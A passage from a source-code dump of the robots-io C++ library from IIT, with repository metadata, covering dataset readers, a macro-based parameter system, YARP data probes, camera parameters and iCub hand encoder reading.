"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/DatasetDetection.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nDatasetDetection::DatasetDetection(const std::string& file_path) :\n DatasetDataStream(file_path, 0, 0, 4)\n{}\n\n\nDatasetDetection::~DatasetDetection()\n{}\n\n\nbool DatasetDetection::freeze(const bool blocking)\n{\n if (!DatasetDataStream::freeze())\n return false;\n\n VectorXd bounding_box_data = data();\n\n detection_ = cv::Rect(bounding_box_data(0), bounding_box_data(1), bounding_box_data(2), bounding_box_data(3));\n\n return true;\n}\n\n\ncv::Rect DatasetDetection::detection() const\n{\n return detection_;\n}\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7642045617103577,
"avg_line_length": 24.14285659790039,
"blob_id": "7e3fe3de1173d7cbeef7a1207673cc6ed6e9e497",
"content_id": "2ca4cbacaab89039d91ba6631e494fe3dee0690d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 352,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 14,
"path": "/src/RobotsIO/src/Utils/TransformWithVelocity.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/TransformWithVelocity.h>\n\nusing namespace RobotsIO::Utils;\n\n\nTransformWithVelocity::~TransformWithVelocity()\n{}\n"
},
{
"alpha_fraction": 0.6000824570655823,
"alphanum_fraction": 0.6014572381973267,
"avg_line_length": 28.09600067138672,
"blob_id": "473a0b764b04adbc84b9d49a2ddd1bf89d0e953e",
"content_id": "9b44329f48d379c1cea8579592509c55bc80a2cc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7274,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 250,
"path": "/src/RobotsIO/include/RobotsIO/Utils/Parameters.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_PARAMETERS_H\n#define ROBOTSIO_PARAMETERS_H\n\n#include <RobotsIO/Utils/ParametersExtractor.h>\n#include <RobotsIO/Utils/ParametersFiller.h>\n\n#include <string>\n#include <stdexcept>\n#include <unordered_map>\n#include <vector>\n\nnamespace RobotsIO {\n namespace Utils {\n class Parameters;\n }\n}\n\n#define robots_io_field_storage(type) \\\n std::unordered_map<std::string, type > type##_data_; \\\n\n#define robots_io_std_field_storage(type) \\\n std::unordered_map<std::string, std::type > type##_data_; \\\n\n#define robots_io_field_getter(type) \\\n type get_##type(const std::string& name) const; \\\n\n#define robots_io_std_field_getter(type) \\\n std::type get_##type(const std::string& name) const; \\\n\n#define robots_io_field_setter(type) \\\n void set_##type(const std::string& name, const type& value); \\\n\n#define robots_io_std_field_setter(type) \\\n void set_##type(const std::string& name, const std::type& value); \\\n\n#define robots_io_declare_field(class_name, type, name) \\\n type name() const; \\\n \\\n void name(const type& value); \\\n \\\n class Field_##name : public Field \\\n { \\\n public: \\\n void extract_field(const class_name ¶meters, RobotsIO::Utils::ParametersExtractor& extractor) const override; \\\n \\\n bool fill_field(class_name ¶meters, const RobotsIO::Utils::ParametersFiller& extractor) override; \\\n \\\n }; \\\n \\\n friend class Field_##name;\n\n#define robots_io_declare_std_field(class_name, type, name) \\\n std::type name() const; \\\n \\\n void name(const std::type& value); \\\n \\\n class Field_##name : public Field \\\n { \\\n public: \\\n void extract_field(const class_name ¶meters, RobotsIO::Utils::ParametersExtractor& extractor) const override; \\\n \\\n bool fill_field(class_name ¶meters, const RobotsIO::Utils::ParametersFiller& extractor) override; \\\n \\\n }; \\\n \\\n friend class Field_##name;\n\n#define robots_io_accessor(class_name) \\\n class_name(const RobotsIO::Utils::ParametersFiller& filler); \\\n \\\n class Field \\\n { \\\n public: \\\n virtual void extract_field(const class_name& parameters, RobotsIO::Utils::ParametersExtractor& extractor) const = 0; \\\n \\\n virtual bool fill_field(class_name& parameters, const RobotsIO::Utils::ParametersFiller& filler) = 0; \\\n }; \\\n \\\n std::unordered_map<std::string, Field*> fields_; \\\n \\\n void extract_field(const std::string& key, RobotsIO::Utils::ParametersExtractor& extractor) const override; \\\n \\\n bool fill_field(const std::string& key, const RobotsIO::Utils::ParametersFiller& filler) override; \\\n \\\n std::vector<std::string> keys() const override;\n\n#define robots_io_declare_field_impl(class_name, type, name) \\\n type class_name::name() const \\\n { \\\n return get_##type(#name); \\\n } \\\n \\\n void class_name::name(const type& value) \\\n { \\\n if (fields_.find(#name) == fields_.end()) \\\n fields_[#name] = new Field_##name(); \\\n set_##type(#name, value); \\\n } \\\n \\\n void class_name::Field_##name::extract_field(const class_name& parameters, RobotsIO::Utils::ParametersExtractor& extractor) const \\\n { \\\n extractor.extract_field(#name, parameters.name()); \\\n } \\\n \\\n bool class_name::Field_##name::fill_field(class_name& parameters, const RobotsIO::Utils::ParametersFiller& filler) \\\n { \\\n bool is_value = false; \\\n type value; \\\n std::tie(is_value, value) = filler.fill_##type(#name); \\\n if (!is_value) \\\n return false; \\\n \\\n parameters.name(value); \\\n \\\n return true; \\\n } \\\n\n#define robots_io_declare_std_field_impl(class_name, type, name) \\\n std::type class_name::name() const \\\n { \\\n return get_##type(#name); \\\n } \\\n \\\n void class_name::name(const std::type& value) \\\n { \\\n if (fields_.find(#name) == fields_.end()) \\\n fields_[#name] = new Field_##name(); \\\n set_##type(#name, value); \\\n } \\\n \\\n void class_name::Field_##name::extract_field(const class_name& parameters, RobotsIO::Utils::ParametersExtractor& extractor) const \\\n { \\\n extractor.extract_field(#name, parameters.name()); \\\n } \\\n \\\n bool class_name::Field_##name::fill_field(class_name& parameters, const RobotsIO::Utils::ParametersFiller& filler) \\\n { \\\n bool is_value = false; \\\n std::type value; \\\n std::tie(is_value, value) = filler.fill_##type(#name); \\\n if (!is_value) \\\n return false; \\\n \\\n parameters.name(value); \\\n \\\n return true; \\\n }\n\n#define robots_io_accessor_impl(class_name) \\\n class_name::class_name(const RobotsIO::Utils::ParametersFiller& filler) \\\n : class_name() \\\n { \\\n for (const std::string& key : keys()) \\\n if (!fill_field(key, filler)) \\\n { \\\n throw(std::runtime_error(std::string(#class_name) + \"::ctor. Field \" + key + \" not available in provided filler.\")); \\\n } \\\n } \\\n \\\n void class_name::extract_field(const std::string& key, RobotsIO::Utils::ParametersExtractor& extractor) const \\\n { \\\n fields_.at(key)->extract_field(*this, extractor); \\\n } \\\n \\\n bool class_name::fill_field(const std::string& key, const RobotsIO::Utils::ParametersFiller& filler) \\\n { \\\n return fields_.at(key)->fill_field(*this, filler); \\\n } \\\n \\\n std::vector<std::string> class_name::keys() const\\\n { \\\n std::vector<std::string> keys; \\\n for (const auto& field : fields_) \\\n keys.push_back(field.first); \\\n return keys; \\\n } \\\n\nclass RobotsIO::Utils::Parameters\n{\npublic:\n /**\n * Field filler from name\n */\n virtual bool fill_field(const std::string& key, const RobotsIO::Utils::ParametersFiller& filler) = 0;\n\n /**\n * Field extractor from name\n */\n virtual void extract_field(const std::string& key, RobotsIO::Utils::ParametersExtractor& extractor) const = 0;\n\n /**\n * Field keys accessor\n */\n virtual std::vector<std::string> keys() const = 0;\n\n /**\n * Pointer to the base class object.\n */\n const Parameters* parameters() const;\n\nprotected:\n /**\n * Getters\n */\n robots_io_std_field_getter(string);\n\n robots_io_std_field_getter(size_t);\n\n robots_io_field_getter(double);\n\n robots_io_field_getter(int);\n\n robots_io_field_getter(bool);\n\n /**\n * Setters\n */\n robots_io_std_field_setter(string);\n\n robots_io_std_field_setter(size_t);\n\n robots_io_field_setter(double);\n\n robots_io_field_setter(int);\n\n robots_io_field_setter(bool);\n\nprivate:\n /**\n * Key-value pairs storage\n */\n robots_io_std_field_storage(string);\n\n robots_io_std_field_storage(size_t);\n\n robots_io_field_storage(double);\n\n robots_io_field_storage(int);\n\n robots_io_field_storage(bool);\n};\n\n#endif /* ROBOTSIO_PARAMETERS_H */\n"
},
{
"alpha_fraction": 0.7107880711555481,
"alphanum_fraction": 0.7138485312461853,
"avg_line_length": 26.22916603088379,
"blob_id": "9fba07bdd879b5842ed6a17da85aa0bf8ec8d924",
"content_id": "00e8b9884edd8a3e324ed3139dd83c0901fd1839",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2614,
"license_type": "permissive",
"max_line_length": 191,
"num_lines": 96,
"path": "/src/RobotsIO/include/RobotsIO/Utils/YarpVectorOfProbe.hpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_YARPVECTOROFPROBE_H\n#define ROBOTSIO_YARPVECTOROFPROBE_H\n\n#include <Eigen/Dense>\n\n#include <RobotsIO/Utils/Data.h>\n#include <RobotsIO/Utils/Probe.h>\n#include <RobotsIO/Utils/TransformWithVelocity.h>\n#include <RobotsIO/Utils/YarpBufferedPort.hpp>\n#include <RobotsIO/Utils/any.h>\n\n#include <opencv2/opencv.hpp>\n\n#include <string>\n\n#include <yarp/eigen/Eigen.h>\n#include <yarp/sig/Vector.h>\n\nnamespace RobotsIO {\n namespace Utils {\n template <class T, class U = yarp::sig::VectorOf<T>>\n class YarpVectorOfProbe;\n }\n}\n\n\ntemplate <class T, class U>\nclass RobotsIO::Utils::YarpVectorOfProbe : public RobotsIO::Utils::YarpBufferedPort<yarp::sig::VectorOf<T>>,\n public RobotsIO::Utils::Probe\n{\npublic:\n YarpVectorOfProbe(const std::string& port_name);\n\n virtual ~YarpVectorOfProbe();\n\nprotected:\n void on_new_data() override;\n\nprivate:\n yarp::sig::VectorOf<T> convert_from(const U& data);\n\n yarp::sig::VectorOf<T> data_;\n\n const std::string log_name_ = \"YarpVectorOfProbe\";\n};\n\n\ntemplate <class T, class U>\nRobotsIO::Utils::YarpVectorOfProbe<T, U>::YarpVectorOfProbe(const std::string& port_name) :\n YarpBufferedPort<yarp::sig::VectorOf<T>>(port_name)\n{}\n\n\ntemplate <class T, class U>\nRobotsIO::Utils::YarpVectorOfProbe<T, U>::~YarpVectorOfProbe()\n{}\n\n\ntemplate <class T, class U>\nvoid RobotsIO::Utils::YarpVectorOfProbe<T, U>::on_new_data()\n{\n data_ = convert_from(RobotsIO::Utils::any_cast<U>(get_data()));\n\n this->send_data(data_);\n}\n\n\ntemplate <class T, class U>\nyarp::sig::VectorOf<T> RobotsIO::Utils::YarpVectorOfProbe<T, U>::convert_from(const U& data)\n{\n return data;\n}\n\n\ntemplate <>\nyarp::sig::VectorOf<double> RobotsIO::Utils::YarpVectorOfProbe<double, Eigen::VectorXd>::convert_from(const Eigen::VectorXd& data);\n\n\ntemplate <>\nyarp::sig::VectorOf<double> RobotsIO::Utils::YarpVectorOfProbe<double, Eigen::Transform<double, 3, Eigen::Affine>>::convert_from(const Eigen::Transform<double, 3, Eigen::Affine>& data);\n\n\ntemplate <>\nyarp::sig::VectorOf<double> RobotsIO::Utils::YarpVectorOfProbe<double, RobotsIO::Utils::TransformWithVelocityStorage>::convert_from(const RobotsIO::Utils::TransformWithVelocityStorage& data);\n\ntemplate <>\nyarp::sig::VectorOf<int> RobotsIO::Utils::YarpVectorOfProbe<int, cv::Rect>::convert_from(const cv::Rect& data);\n\n#endif /* ROBOTSIO_YARPVECTOROFPROBE_H */\n"
},
{
"alpha_fraction": 0.7307335138320923,
"alphanum_fraction": 0.7353760600090027,
"avg_line_length": 23.477272033691406,
"blob_id": "0042946e98d902852173871fa06b94389eadeacc",
"content_id": "96504f867788ff8fd1e240728d2c276d5592660a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1077,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 44,
"path": "/src/RobotsIO/include/RobotsIO/Camera/CameraParameters.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_CAMERAPARAMETERS_H\n#define ROBOTSIO_CAMERAPARAMETERS_H\n\n#include <RobotsIO/Utils/Parameters.h>\n\nnamespace RobotsIO {\n namespace Camera {\n struct CameraParameters;\n }\n}\n\n\nclass RobotsIO::Camera::CameraParameters : public RobotsIO::Utils::Parameters\n{\npublic:\n CameraParameters();\n\n virtual ~CameraParameters();\n\n robots_io_accessor(CameraParameters);\n\n robots_io_declare_field(CameraParameters, int, width);\n\n robots_io_declare_field(CameraParameters, int, height);\n\n robots_io_declare_field(CameraParameters, double, cx);\n\n robots_io_declare_field(CameraParameters, double, cy);\n\n robots_io_declare_field(CameraParameters, double, fx);\n\n robots_io_declare_field(CameraParameters, double, fy);\n\n robots_io_declare_field(CameraParameters, bool, initialized);\n};\n\n#endif /* ROBOTSIO_CAMERAPARAMETERS_H */\n"
},
{
"alpha_fraction": 0.673378050327301,
"alphanum_fraction": 0.6838180422782898,
"avg_line_length": 23.381818771362305,
"blob_id": "d05b6dd695687abfebf710fced3ef2425cb04572",
"content_id": "ed46354746ac2a6b566851aa5a1bba8ef9789291",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1341,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 55,
"path": "/src/RobotsIO/src/Utils/DatasetTransform.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/DatasetTransform.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nDatasetTransform::DatasetTransform\n(\n const std::string& file_path,\n const std::size_t& skip_rows,\n const std::size_t& skip_cols,\n const std::size_t& expected_cols,\n const int rx_time_index,\n const int tx_time_index\n) :\n DatasetDataStream(file_path, skip_rows, skip_cols, expected_cols, rx_time_index, tx_time_index)\n{}\n\n\nDatasetTransform::~DatasetTransform()\n{}\n\n\nEigen::Transform<double, 3, Eigen::Affine> DatasetTransform::transform()\n{\n return transform_;\n}\n\n\nbool DatasetTransform::freeze(const bool blocking)\n{\n if (!DatasetDataStream::freeze())\n return false;\n\n VectorXd transform_data = data();\n\n bool invalid_pose = true;\n for (std::size_t i = 0; i < transform_data.size(); i++)\n invalid_pose &= (transform_data(i) == 0.0);\n if (invalid_pose)\n return false;\n\n transform_ = Translation<double, 3>(transform_data.head<3>());\n AngleAxisd rotation(transform_data(6), transform_data.segment<3>(3));\n transform_.rotate(rotation);\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.6634249687194824,
"alphanum_fraction": 0.6655390858650208,
"avg_line_length": 22.649999618530273,
"blob_id": "d33622beb7ee958eada2620b31b8b611ba345662",
"content_id": "ad3aa1500bb3ca6bf6afa68f3677e234bc4ab90d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2365,
"license_type": "permissive",
"max_line_length": 199,
"num_lines": 100,
"path": "/src/RobotsIO/include/RobotsIO/Hand/iCubHand.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_ICUBHAND_H\n#define ROBOTSIO_ICUBHAND_H\n\n#include <Eigen/Dense>\n\n#include <iCub/iKin/iKinFwd.h>\n\n#include <yarp/dev/IAnalogSensor.h>\n#include <yarp/dev/IControlLimits.h>\n#include <yarp/dev/IEncoders.h>\n#include <yarp/dev/PolyDriver.h>\n#include <yarp/sig/Matrix.h>\n#include <yarp/os/Network.h>\n#include <yarp/os/ResourceFinder.h>\n\n#include <string>\n#include <unordered_map>\n\nnamespace RobotsIO {\n namespace Hand {\n class iCubHand;\n }\n}\n\n\nclass RobotsIO::Hand::iCubHand\n{\npublic:\n iCubHand(const std::string& robot_name, const std::string& laterality, const std::string& port_prefix, const std::string& context, const bool& use_analogs, const std::string& thumb_version = \"\");\n\n virtual ~iCubHand();\n\n std::pair<bool, std::unordered_map<std::string, Eigen::VectorXd>> encoders(const bool& blocking);\n\nprotected:\n std::pair<bool, yarp::sig::Vector> load_vector_double(const yarp::os::ResourceFinder& rf, const std::string key, const std::size_t size);\n\n yarp::os::Network yarp_;\n\n const bool use_analogs_ = false;\n\n /**\n * Indicates whether the PolyDriver interface is available.\n */\n\n bool use_interface_analogs_ = false;\n\n bool use_interface_arm_ = false;\n\n /**\n * To be used if the interface is available.\n */\n\n yarp::dev::PolyDriver drv_analog_;\n\n yarp::dev::IAnalogSensor *ianalog_{nullptr};\n\n yarp::dev::IControlLimits *ilimits_{nullptr};\n\n yarp::dev::PolyDriver drv_arm_;\n\n yarp::dev::IEncoders *iarm_{nullptr};\n\n /**\n * To be used if the interface is not available.\n */\n\n yarp::os::BufferedPort<yarp::os::Bottle> port_analogs_;\n\n yarp::os::BufferedPort<yarp::os::Bottle> port_arm_;\n\n /**\n * Instances of iCub::iKin::iCubFinger required to combine arm and analog encoders.\n */\n\n std::unordered_map<std::string, iCub::iKin::iCubFinger> fingers_;\n\n /**\n * Optional analog bounds.\n */\n\n yarp::sig::Matrix analog_bounds_;\n\n bool use_bounds_ = false;\n\n /**\n * Log name to be used in messages printed by the class.\n */\n\n const std::string log_name_ = \"iCubHand\";\n};\n\n#endif /* ROBOTSIO_ICUBHAND_H */\n"
},
{
"alpha_fraction": 0.7054973840713501,
"alphanum_fraction": 0.7303664684295654,
"avg_line_length": 20.22222137451172,
"blob_id": "458e1997db654cb142b936bfce23123554bd0102",
"content_id": "4748bd849438ee2ce25411dca04632694042d69c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 764,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 36,
"path": "/src/RobotsIO/test/Utils/Parameters/TestParameters.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <TestParameters.h>\n\nrobots_io_accessor_impl(TestParameters);\n\nrobots_io_declare_field_impl(TestParameters, int, field0);\n\nrobots_io_declare_field_impl(TestParameters, double, field1);\n\nrobots_io_declare_field_impl(TestParameters, bool, field2);\n\nrobots_io_declare_std_field_impl(TestParameters, string, field3);\n\nrobots_io_declare_std_field_impl(TestParameters, size_t, field4);\n\nTestParameters::TestParameters()\n{\n field0(0);\n\n field1(0.0);\n\n field2(true);\n\n field3(\"\");\n\n field4(0);\n}\n\nTestParameters::~TestParameters()\n{}\n"
},
{
"alpha_fraction": 0.5587717294692993,
"alphanum_fraction": 0.5637243986129761,
"avg_line_length": 30.43944549560547,
"blob_id": "67a6cf7e9bf94605eb828a30ff45d829ff9ef816",
"content_id": "cdd1f9824a0002bd54ba29395923b3ac691b8f6f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 9086,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 289,
"path": "/src/RobotsIO/src/Hand/iCubHand.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Hand/iCubHand.h>\n\n#include <yarp/eigen/Eigen.h>\n#include <yarp/os/Property.h>\n#include <yarp/os/ResourceFinder.h>\n#include <yarp/sig/Vector.h>\n\n#include <deque>\n#include <iostream>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Hand;\nusing namespace iCub::iKin;\nusing namespace yarp::dev;\nusing namespace yarp::eigen;\nusing namespace yarp::os;\nusing namespace yarp::sig;\n\n\niCubHand::iCubHand\n(\n const std::string& robot_name,\n const std::string& laterality,\n const std::string& port_prefix,\n const std::string& context,\n const bool& use_analogs,\n const std::string& thumb_version\n) :\n use_analogs_(use_analogs)\n{\n /* Check YARP network. */\n if (!yarp_.checkNetwork())\n {\n throw(std::runtime_error(log_name_ + \"::ctor. Error: YARP network is not available.\"));\n }\n\n /* Check for laterality. */\n if ((laterality != \"right\") && (laterality != \"left\"))\n {\n throw std::runtime_error(log_name_ + \"::ctor. Error: invalid laterality\" + laterality + \".\");\n }\n\n if (use_analogs_)\n {\n /* Load configuration from config file. */\n ResourceFinder rf;\n rf.setVerbose(true);\n rf.setDefaultConfigFile(\"icub_hand_configuration.ini\");\n rf.setDefaultContext(context);\n rf.configure(0, NULL);\n\n /* Get inner resource finder according to requested laterality. */\n ResourceFinder inner_rf = rf.findNestedResourceFinder(laterality.c_str());\n bool use_bounds_ = inner_rf.check(\"use_bounds\", Value(false)).asBool();\n if (use_bounds_)\n {\n bool valid_vector;\n yarp::sig::Vector bounds_col_0;\n std::tie(valid_vector, bounds_col_0) = load_vector_double(inner_rf, \"bounds_col_0\", 16);\n if (!valid_vector)\n {\n throw std::runtime_error(log_name_ + \"::ctor. Error: bounds requested but not available in the configuration file.\");\n }\n\n yarp::sig::Vector bounds_col_1;\n std::tie(valid_vector, bounds_col_1) = load_vector_double(inner_rf, \"bounds_col_1\", 16);\n if (!valid_vector)\n {\n throw std::runtime_error(log_name_ + \"::ctor. Error: bounds requested but not available in the configuration file.\");\n }\n\n analog_bounds_.resize(16, 2);\n analog_bounds_.setCol(0, bounds_col_0);\n analog_bounds_.setCol(1, bounds_col_1);\n }\n\n /* Try to use PolyDriver for analogs. */\n Property prop_analog;\n prop_analog.put(\"device\", \"analogsensorclient\");\n prop_analog.put(\"local\", \"/\" + port_prefix + \"/\" + laterality + \"_hand/analog:i\");\n prop_analog.put(\"remote\", \"/\" + robot_name + \"/\" + laterality + \"_hand/analog:o\");\n if (drv_analog_.open(prop_analog))\n {\n /* Try to retrieve the view. */\n if (drv_analog_.view(ianalog_) && ianalog_ != nullptr)\n use_interface_analogs_ = true;\n }\n\n if (!use_interface_analogs_)\n {\n /* If the PolyDriver is not available, use a standard port. */\n std::cout << log_name_ + \"::ctor. Info: PolyDriver interface IAnalogSensors not available. Using raw encoders from a port.\" << std::endl;\n\n if (!port_analogs_.open(\"/\" + port_prefix + \"/\" + laterality + \"_hand/analog:i\"))\n {\n throw std::runtime_error(log_name_ + \"::ctor. Error: unable to open port for analog encoders.\");\n }\n }\n }\n\n /* Try to use PolyDriver for encoders. */\n Property prop_encoders;\n prop_encoders.put(\"device\", \"remote_controlboard\");\n prop_encoders.put(\"local\", \"/\" + port_prefix + \"/\" + laterality + \"_arm\");\n prop_encoders.put(\"remote\", \"/\" + robot_name + \"/\" + laterality + \"_arm\");\n if (drv_arm_.open(prop_encoders))\n {\n /* Try to retrieve the view. */\n if (drv_arm_.view(iarm_) && iarm_ != nullptr)\n use_interface_arm_ = true;\n\n /* Try to retrieve the control limits view. */\n if (!(drv_arm_.view(ilimits_)) || (ilimits_ == nullptr))\n throw std::runtime_error(log_name_ + \"::ctor. Error: unable get view for finger control limits.\");\n }\n\n if (!use_interface_arm_)\n {\n /* If the PolyDriver is not available, use a standard port. */\n std::cout << log_name_ + \"::ctor. Info: PolyDriver interface IEncoders not available. Using raw encoders from a port.\" << std::endl;\n\n if (!port_arm_.open(\"/\" + port_prefix + \"/\" + laterality + \"_arm\"))\n {\n throw std::runtime_error(log_name_ + \"::ctor. Error: unable to open port for arm encoders.\");\n }\n }\n\n /* Instantiate iCubFinger-s .*/\n std::string thumb_key = \"thumb\";\n if (!thumb_version.empty())\n thumb_key += \"_\" + thumb_version;\n fingers_[\"thumb\"] = iCubFinger(laterality + \"_\" + thumb_key);\n fingers_[\"index\"] = iCubFinger(laterality + \"_index\");\n fingers_[\"middle\"] = iCubFinger(laterality + \"_middle\");\n fingers_[\"ring\"] = iCubFinger(laterality + \"_ring\");\n fingers_[\"little\"] = iCubFinger(laterality + \"_little\");\n\n /* Align joint bounds using those of the real robot. */\n if (ilimits_)\n {\n std::deque<IControlLimits*> limits;\n limits.push_back(ilimits_);\n for (auto& finger : fingers_)\n finger.second.alignJointsBounds(limits);\n }\n}\n\n\niCubHand::~iCubHand()\n{\n if (use_analogs_)\n {\n if (use_interface_analogs_)\n drv_analog_.close();\n else\n port_analogs_.close();\n }\n\n if (use_interface_arm_)\n drv_arm_.close();\n else\n port_arm_.close();\n}\n\n\nstd::pair<bool, std::unordered_map<std::string, Eigen::VectorXd>> iCubHand::encoders(const bool& blocking)\n{\n /* Analog encoders. */\n yarp::sig::Vector analogs(15);\n bool outcome_analog = false;\n\n if (use_analogs_)\n {\n if (use_interface_analogs_)\n outcome_analog = (ianalog_->read(analogs)) == (IAnalogSensor::AS_OK);\n else\n {\n Bottle* bottle_analogs = port_analogs_.read(blocking);\n\n if (bottle_analogs != nullptr)\n {\n for (size_t i = 0; i < analogs.size(); i++)\n analogs(i) = bottle_analogs->get(i).asFloat64();\n\n outcome_analog = true;\n }\n }\n }\n\n /* Arm encoders. */\n yarp::sig::Vector encoders(9);\n\n bool outcome_arm = false;\n\n {\n yarp::sig::Vector arm(16);\n\n if (use_interface_arm_)\n outcome_arm = iarm_->getEncoders(arm.data());\n else\n {\n Bottle* bottle_arm = port_arm_.read(blocking);\n\n if (bottle_arm != nullptr)\n {\n for (size_t i = 0; i < arm.size(); i++)\n arm(i) = bottle_arm->get(i).asFloat64();\n\n outcome_arm = true;\n }\n }\n\n /* Get only part of arm encoders related to the fingers. */\n toEigen(encoders) = toEigen(arm).segment<9>(7);\n }\n\n if (use_analogs_)\n {\n if (!(outcome_analog && outcome_arm))\n return std::make_pair(false, std::unordered_map<std::string, VectorXd>());\n }\n else\n {\n if (!outcome_arm)\n return std::make_pair(false, std::unordered_map<std::string, VectorXd>());\n }\n\n /* Combine arm and analog encoders. */\n std::unordered_map<std::string, VectorXd> output_encoders;\n for (auto& finger : fingers_)\n {\n yarp::sig::Vector chain_joints;\n if (use_analogs_)\n {\n if (use_bounds_)\n finger.second.getChainJoints(encoders, analogs, chain_joints, analog_bounds_);\n else\n finger.second.getChainJoints(encoders, analogs, chain_joints);\n }\n else\n finger.second.getChainJoints(encoders, chain_joints);\n\n VectorXd chain_joints_eigen = toEigen(chain_joints) * M_PI / 180.0;\n output_encoders[finger.first] = chain_joints_eigen;\n }\n\n return std::make_pair(true, output_encoders);\n}\n\n\nstd::pair<bool, yarp::sig::Vector> iCubHand::load_vector_double(const ResourceFinder& rf, const std::string key, const std::size_t size)\n{\n bool ok = true;\n\n if (rf.find(key).isNull())\n ok = false;\n\n Bottle* b = rf.find(key).asList();\n if (b == nullptr)\n ok = false;\n\n if (b->size() != size)\n ok = false;\n\n if (!ok)\n return std::make_pair(false, yarp::sig::Vector());\n\n yarp::sig::Vector vector(size);\n for (std::size_t i = 0; i < b->size(); i++)\n {\n Value item_v = b->get(i);\n if (item_v.isNull())\n return std::make_pair(false, yarp::sig::Vector());\n\n if (!item_v.isFloat64())\n return std::make_pair(false, yarp::sig::Vector());\n\n vector(i) = item_v.asFloat64();\n }\n\n return std::make_pair(true, vector);\n}\n"
},
{
"alpha_fraction": 0.7260273694992065,
"alphanum_fraction": 0.7376185655593872,
"avg_line_length": 19.630434036254883,
"blob_id": "31226cbb020e13246238a85cde0b4a53aeac331e",
"content_id": "9593aec6c0b1eff9d8c9bd8473847850de5dd845",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 949,
"license_type": "permissive",
"max_line_length": 146,
"num_lines": 46,
"path": "/src/RobotsIO/src/Utils/SpatialVelocityBuffer.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
